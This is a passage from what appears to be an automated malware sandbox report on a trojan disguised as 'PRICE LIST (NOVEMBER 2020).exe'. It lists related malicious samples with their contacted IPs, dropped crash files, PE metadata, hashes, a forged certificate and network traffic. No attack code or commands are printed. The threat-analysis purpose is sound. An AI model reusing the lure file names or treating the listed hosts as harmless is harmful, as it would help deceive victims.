                                                SecuriteInfo.com.Trojan.GenericKDZ.73123.31244.exeGet hashmaliciousBrowse
                                                • 104.21.50.15
                                                SecuriteInfo.com.Trojan.GenericKD.36273230.25906.exeGet hashmaliciousBrowse
                                                • 104.21.50.15
                                                v2.exeGet hashmaliciousBrowse
                                                • 172.67.188.154
                                                Purchase_order_397484658464974945648447564845.exeGet hashmaliciousBrowse
                                                • 104.21.71.230
                                                0603321WG_0_1 pdf.exeGet hashmaliciousBrowse
                                                • 172.67.172.17
                                                Payment_pdf.exeGet hashmaliciousBrowse
                                                • 172.67.172.17
                                                8WjU4jrBIr.exeGet hashmaliciousBrowse
                                                • 104.23.98.190
                                                RG6ws8jWUJ.exeGet hashmaliciousBrowse
                                                • 172.67.172.17
                                                8TD8GfTtaW.exeGet hashmaliciousBrowse
                                                • 104.23.99.190
                                                lpdKSOB78u.exeGet hashmaliciousBrowse
                                                • 104.21.76.239
                                                VIws8bzjD5.exeGet hashmaliciousBrowse
                                                • 172.67.172.17
                                                PURCHASE ITEMS.exeGet hashmaliciousBrowse
                                                • 172.67.172.17
                                                Shipping Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                • 172.67.188.154
                                                CN-Invoice-XXXXX9808-19011143287992.exeGet hashmaliciousBrowse
                                                • 172.67.172.17
                                                Halkbank_Ekstre_20210223_082357_541079.exeGet hashmaliciousBrowse
                                                • 172.67.188.154
                                                quotation_PR # 00459182..exeGet hashmaliciousBrowse
                                                • 172.67.172.17
                                                FOB offer_1164087223_I0133P2100363812.PDF.exeGet hashmaliciousBrowse
                                                • 104.21.19.200

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_PRICE LIST (NOVE_2669e49e9dcb5c7f076336b8bf762a6b5e1646_915b61a4_1a53eef2\Report.wer
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):15584
                                                Entropy (8bit):3.7777374596954356
                                                Encrypted:false
                                                SSDEEP:96:MqMJbRQMvSklnLWMlHHxpLUpXINSm+BHUHZ0ownOgtYsH5Ef5BAKcp2OyPnr3sbh:34b1mPaKsUAeZiN/u7snS274Itk/
                                                MD5:6D2C097DF4D3059EC092A091C97A3831
                                                SHA1:82DC0B4978968722A56BD814F3A4CCFDBC5ABDBC
                                                SHA-256:789338BB58CA739D236920017EEB239D7693FE12B36A1C2ABF5872DC04CF5FA7
                                                SHA-512:3C811B676C510EEFA6F9D0282A301B0431552AE1469167B4EB719ECAEAD6B5BD0B8A1C79D6D34D5ED8A8B79FB2603C4EA050782392A32029AE808AA306F304C0
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.5.7.6.7.1.5.6.5.2.7.7.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.5.7.6.7.2.6.9.0.2.7.1.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.5.6.6.5.2.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.e.7.5.3.5.f.-.d.4.f.5.-.4.1.2.b.-.8.9.a.3.-.f.1.3.e.0.a.3.b.3.7.e.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.8.9.e.a.d.0.d.-.6.1.a.a.-.4.9.f.e.-.8.c.d.8.-.e.9.f.b.f.7.b.7.1.7.2.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.R.I.C.E. .L.I.S.T. .(.N.O.V.E.M.B.E.R. .2.0.2.0.)...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.7.0.-.0.0.0.1.-.0.0.1.7.-.5.0.7.2.-.7.1.7.2.0.d.0.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.9.9.e.7.3.3.8.a.6.f.1.7.8.c.a.5.7.0.7.4.3.e.9.5.7.3.a.5.0.c.f.0.0.0.0.0.9.0.4.!.0.0.0.0.0.e.c.f.3.1.5.e.5.a.7.2.a.3.c.9.d.d.d.3.8.6.d.1.1.1.6.d.2.2.6.5.8.7.7.b.4.0.2.7.!.P.R.I.C.E. .L.
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERB99A.tmp.dmp
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Tue Feb 23 17:58:38 2021, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):194948
                                                Entropy (8bit):4.467474118310582
                                                Encrypted:false
                                                SSDEEP:3072:20KUCgUmhoiVwtjQ0sATjd+p7p92zfzNB9gIOgF57Cd:2fTjspV105MpVgB9RpD7W
                                                MD5:5A4D0CDF07AE72AC9AB0EB3F74AB08A5
                                                SHA1:E7BF0A16C1871642760E1288C3A1CAD3190AB907
                                                SHA-256:9DBF9E4F9CBBBE087D8E067B1FC56F9161FC6CEF3AE3EE145A31DDAB0C723084
                                                SHA-512:4380BD72D9B6C9632B32CC93F552740A0F493D3D054A29CF25658C2627593D693CB8C57A866E2CDCB1A0873D6151C199C456DE501DB7E8953B9BDE3B3E482B1E
                                                Malicious:false
                                                Reputation:low
                                                Preview: MDMP....... .......NB5`...................U...........B.......)......GenuineIntelW...........T.......p...2B5`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERC7A4.tmp.WERInternalMetadata.xml
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8076
                                                Entropy (8bit):3.707798630191834
                                                Encrypted:false
                                                SSDEEP:192:Rrl7r3GLNiE46ym6YJASUO9WAgmfZ2SpCprw89bpxsfZjm:RrlsNiT6j6Y+SUO9JgmfESMpqfQ
                                                MD5:6AF5FDF92E90A0C83292F3C9D33FCC05
                                                SHA1:B9F910EF08C96184C3575D7B5D5D1720AA8A82B4
                                                SHA-256:1B82C513BEAB7C25CA1478BAEFBA5AB27DB831D78798BC83A3F889774030C1ED
                                                SHA-512:DCAB9849C6FD364E9F9C06F3DD3D7EC86C559AD983844813EC784C7F753BD4DF104331D5EDE0C73131F4FE9F0F6CE868F35969EAE58159EB68F8E76E88C16630
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.2.4.<./.P.i.d.>.......
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERCBCC.tmp.xml
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4768
                                                Entropy (8bit):4.536018555521011
                                                Encrypted:false
                                                SSDEEP:48:cvIwSD8zs/8JgtWI9B7hWSC8B38fm8M4JwulxFFL+q8v5xBUWGH91Lq189d:uITfS+MSNKJwGKyWGHLLyKd
                                                MD5:029B30A5F5B15B8ECB55D6067F686CC3
                                                SHA1:B77A0EC03763101D48BAA1D73F9F9CB555417C05
                                                SHA-256:A7A63DF05F192787C5408AADEFD4C98215256A235F3124C90289BBA4541089C4
                                                SHA-512:1F7FB135BDC6A00882E20BEEF95B43CED5F3559B78BC375B6C4C1C71C9E9F557D9043AC8A9A371512201F6AE88C9AFE51D7BF6595616EADECCCEFBCB39E44899
                                                Malicious:false
                                                Reputation:low
                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="874269" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):6.9085274554917975
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:PRICE LIST (NOVEMBER 2020).exe
                                                File size:32624
                                                MD5:404ef05a6acc67c2b59189171f9eb0fc
                                                SHA1:0ecf315e5a72a3c9ddd386d1116d2265877b4027
                                                SHA256:863d464bb43bda7378c611a5c16410a3c279ca72e447632f5e03f8418f5464d8
                                                SHA512:19ea2b67ef1661bcb5c2bb9640970ad8f3c734958853cd98045eb79b833d3b3bbfa0af59b1cf49e7175e9fa0d3dc3d4dfe75ce97fb6053b6f94d18510a296c0a
                                                SSDEEP:768:SxBXcbNpmqXnAfyjpX999Z99DfjAw4mTkrkEkeDhSa:SzuDp999Z99/d4mwIhE
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....F...............0..`..........^~... ........@.. ....................................@................................

                                                File Icon

                                                Icon Hash:00828e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x407e5e
                                                Entrypoint Section:.text
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                Time Stamp:0x88460DE1 [Fri Jun 13 17:14:09 2042 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:v4.0.30319
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Authenticode Signature

                                                Signature Valid:false
                                                Signature Issuer:C=????????????????????????????????????????????????, S=&#229;&#135;&#143;&#229;&#135;&#152;&#229;&#135;&#151;&#229;&#134;&#185;&#229;&#135;&#133;&#229;&#135;&#147;&#229;&#135;&#156;&#229;&#134;&#172;&#229;&#135;&#155;&#229;&#134;&#163;&#229;&#134;&#170;&#229;&#134;&#185;&#229;&#135;&#143;&#229;&#134;&#168;&#229;&#134;&#175;&#229;&#134;&#164;&#229;&#135;&#138;&#229;&#134;&#178;&#229;&#134;&#179;&#229;&#135;&#149;&#229;&#134;&#170;&#229;&#134;&#179;, L=&#239;&#132;&#158;&#239;&#132;&#160;&#239;&#132;&#157;&#239;&#133;&#135;&#239;&#132;&#167;&#239;&#132;&#190;&#239;&#132;&#158;&#239;&#133;&#141;&#239;&#132;&#160;&#239;&#133;&#144;&#239;&#132;&#185;&#239;&#133;&#132;&#239;&#132;&#176;&#239;&#132;&#168;&#239;&#133;&#143;&#239;&#132;&#156;&#239;&#132;&#175;&#239;&#132;&#172;&#239;&#132;&#158;&#239;&#133;&#131;&#239;&#132;&#161;&#239;&#133;&#134;&#239;&#132;&#162;&#239;&#132;&#174;&#239;&#133;&#144;&#239;&#132;&#152;&#239;&#133;&#135;&#239;&#132;&#167;&#239;&#133;&#140;&#239;&#132;&#165;, T=&#239;&#190;&#163;&#239;&#189;&#176;&#239;&#190;&#146;&#239;&#190;&#142;&#239;&#189;&#175;&#239;&#189;&#181;&#239;&#190;&#153;&#239;&#189;&#188;&#239;&#189;&#182;&#239;&#190;&#156;&#239;&#189;&#175;&#239;&#190;&#158;&#239;&#189;&#184;&#239;&#190;&#152;&#239;&#190;&#153;&#239;&#190;&#141;, E=???????????????, OU=&#238;&#130;&#129;&#238;&#129;&#159;&#238;&#129;&#153;&#238;&#129;&#162;&#238;&#130;&#136;&#238;&#130;&#139;&#238;&#129;&#190;&#238;&#129;&#151;&#238;&#129;&#163;&#238;&#130;&#138;&#238;&#130;&#131;&#238;&#130;&#138;&#238;&#129;&#164;, O=&#227;&#138;&#161;&#227;&#138;&#155;&#227;&#138;&#144;&#227;&#138;&#149;&#227;&#137;&#182;&#227;&#138;&#155;&#227;&#137;&#184;&#227;&#137;&#171;&#227;&#138;&#139;&#227;&#137;&#180;&#227;&#137;&#179;&#227;&#137;&#187;&#227;&#137;&#168;&#227;&#137;&#174;&#227;&#137;&#168;&#227;&#138;&#158;&#227;&#137;&#181;&#227;&#137;&#168;&#227;&#138;&#139;&#227;&#137;&#184;&#227;&#137;&#173;&#227;&#138;&#137;&#227;&#137;&#182;&#227;&#138;&#136;, CN=&#230;&#158;&#138;&#230;&#158;&#142;&#230;&#159;&#128;&#230;&#158;&#156;&#230;&#158;&#180;&#230;&#158;&#175;&#230;&#158;&#154;&#230;&#158;&#141;&#230;&#158;&#137;&#230;&#158;&#169;&#230;&#158;&#144;&#230;&#158;&#150;&#230;&#158;&#170;&#230;&#158;&#156;&#230;&#158;&#182;&#230;&#158;&#188;&#230;&#158;&#173;&#230;&#158;&#143;&#230;&#158;&#169;&#230;&#158;&#152;&#230;&#158;&#168;&#230;&#158;&#156;&#230;&#158;&#174;&#230;&#158;&#171;&#230;&#158;&#149;&#230;&#158;&#148;
                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                Error Number:-2146762487
                                                Not Before, Not After
                                                • 2/22/2021 2:31:55 PM 2/22/2022 2:31:55 PM
                                                Subject Chain
                                                • C=????????????????????????????????????????????????, S=&#229;&#135;&#143;&#229;&#135;&#152;&#229;&#135;&#151;&#229;&#134;&#185;&#229;&#135;&#133;&#229;&#135;&#147;&#229;&#135;&#156;&#229;&#134;&#172;&#229;&#135;&#155;&#229;&#134;&#163;&#229;&#134;&#170;&#229;&#134;&#185;&#229;&#135;&#143;&#229;&#134;&#168;&#229;&#134;&#175;&#229;&#134;&#164;&#229;&#135;&#138;&#229;&#134;&#178;&#229;&#134;&#179;&#229;&#135;&#149;&#229;&#134;&#170;&#229;&#134;&#179;, L=&#239;&#132;&#158;&#239;&#132;&#160;&#239;&#132;&#157;&#239;&#133;&#135;&#239;&#132;&#167;&#239;&#132;&#190;&#239;&#132;&#158;&#239;&#133;&#141;&#239;&#132;&#160;&#239;&#133;&#144;&#239;&#132;&#185;&#239;&#133;&#132;&#239;&#132;&#176;&#239;&#132;&#168;&#239;&#133;&#143;&#239;&#132;&#156;&#239;&#132;&#175;&#239;&#132;&#172;&#239;&#132;&#158;&#239;&#133;&#131;&#239;&#132;&#161;&#239;&#133;&#134;&#239;&#132;&#162;&#239;&#132;&#174;&#239;&#133;&#144;&#239;&#132;&#152;&#239;&#133;&#135;&#239;&#132;&#167;&#239;&#133;&#140;&#239;&#132;&#165;, T=&#239;&#190;&#163;&#239;&#189;&#176;&#239;&#190;&#146;&#239;&#190;&#142;&#239;&#189;&#175;&#239;&#189;&#181;&#239;&#190;&#153;&#239;&#189;&#188;&#239;&#189;&#182;&#239;&#190;&#156;&#239;&#189;&#175;&#239;&#190;&#158;&#239;&#189;&#184;&#239;&#190;&#152;&#239;&#190;&#153;&#239;&#190;&#141;, E=???????????????, OU=&#238;&#130;&#129;&#238;&#129;&#159;&#238;&#129;&#153;&#238;&#129;&#162;&#238;&#130;&#136;&#238;&#130;&#139;&#238;&#129;&#190;&#238;&#129;&#151;&#238;&#129;&#163;&#238;&#130;&#138;&#238;&#130;&#131;&#238;&#130;&#138;&#238;&#129;&#164;, O=&#227;&#138;&#161;&#227;&#138;&#155;&#227;&#138;&#144;&#227;&#138;&#149;&#227;&#137;&#182;&#227;&#138;&#155;&#227;&#137;&#184;&#227;&#137;&#171;&#227;&#138;&#139;&#227;&#137;&#180;&#227;&#137;&#179;&#227;&#137;&#187;&#227;&#137;&#168;&#227;&#137;&#174;&#227;&#137;&#168;&#227;&#138;&#158;&#227;&#137;&#181;&#227;&#137;&#168;&#227;&#138;&#139;&#227;&#137;&#184;&#227;&#137;&#173;&#227;&#138;&#137;&#227;&#137;&#182;&#227;&#138;&#136;, CN=&#230;&#158;&#138;&#230;&#158;&#142;&#230;&#159;&#128;&#230;&#158;&#156;&#230;&#158;&#180;&#230;&#158;&#175;&#230;&#158;&#154;&#230;&#158;&#141;&#230;&#158;&#137;&#230;&#158;&#169;&#230;&#158;&#144;&#230;&#158;&#150;&#230;&#158;&#170;&#230;&#158;&#156;&#230;&#158;&#182;&#230;&#158;&#188;&#230;&#158;&#173;&#230;&#158;&#143;&#230;&#158;&#169;&#230;&#158;&#152;&#230;&#158;&#168;&#230;&#158;&#156;&#230;&#158;&#174;&#230;&#158;&#171;&#230;&#158;&#149;&#230;&#158;&#148;
                                                Version:3
                                                Thumbprint MD5:838681B16D3D15D936CB197B5FF933E2
                                                Thumbprint SHA-1:979E9C65EF22267B08E05993E729B4436ABFA30A
                                                Thumbprint SHA-256:296F5CC2F7998028F80027C03F4B399B538AC67666FEE8B7152E7336B0487D44
                                                Serial:00DFB81554F129BEF797D45ACC5896E37F

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x7e0c0x4f.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x3e0.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x68000x1770
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000x5e640x6000False0.436645507812data6.84633802835IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .rsrc0x80000x3e00x400False0.4658203125data3.54455503901IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0xa0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_VERSION0x80580x388dataEnglishUnited States

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Version Infos

                                                DescriptionData
                                                LegalCopyrightCopyright 2022 CjiuFAUH. All rights reserved.
                                                Assembly Version4.3.4.0
                                                InternalNameVHQefUyV.exe
                                                FileVersion3.8.6.3
                                                CompanyNameHDCkoRLh
                                                LegalTrademarksSEpyLMyT
                                                CommentsCATdaEvp
                                                ProductNameVHQefUyV
                                                ProductVersion4.3.4.0
                                                FileDescriptionMGLkYrQM
                                                OriginalFilenameVHQefUyV.exe
                                                Translation0x0409 0x0514

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Feb 23, 2021 09:58:11.494297981 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:11.547615051 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.547838926 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:11.550564051 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:11.603761911 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.669672012 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.669734001 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.669766903 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.669791937 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.669801950 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:11.669819117 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.669826031 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:11.669847965 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.669874907 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.669888020 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:11.669902086 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.669926882 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.669944048 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:11.669956923 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.669997931 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:11.670891047 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.670923948 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.670980930 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:11.672159910 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.672192097 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.672246933 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:11.673362970 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.673414946 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.673477888 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:11.674609900 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.674638033 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.674705029 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:11.675905943 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.675949097 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.676017046 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:11.677136898 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.677169085 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.677289009 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:11.678376913 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.678405046 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.678478956 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:11.679609060 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.679640055 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.679706097 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:11.680885077 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.680913925 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:11.680984974 CET4971180192.168.2.6104.21.71.230
